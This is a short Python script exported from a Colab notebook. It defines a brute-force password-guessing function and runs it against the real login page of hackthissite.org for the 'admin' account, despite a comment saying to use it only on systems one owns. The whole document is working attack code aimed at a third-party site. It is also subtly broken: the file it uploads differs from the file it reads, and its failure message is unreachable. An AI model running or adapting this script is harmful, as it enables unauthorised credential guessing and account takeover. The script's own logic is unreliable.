# -*- coding: utf-8 -*-
"""check email.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1nkwizF2flN2JXZdJJhrI3O1e2t0udyBb
"""

import requests

from google.colab import files
uploaded = files.upload()  # Select "passwords.txt" from your local machine

def brute_force_login(target_url, username, password_list="common_passwords.txt"):
  with open(password_list, "r") as file:
        for password in file.readlines():
            password = password.strip()
            data = {"username": username, "password": password}
            response = requests.post(target_url, data=data)
            if "Login failed" not in response.text:
                print(f"Possible credentials found: {username}:{password}")
                return
                print("No valid credentials found.")

# Use only on systems you own/control!
target_url = "https://www.hackthissite.org/user/login"

brute_force_login(target_url, "admin")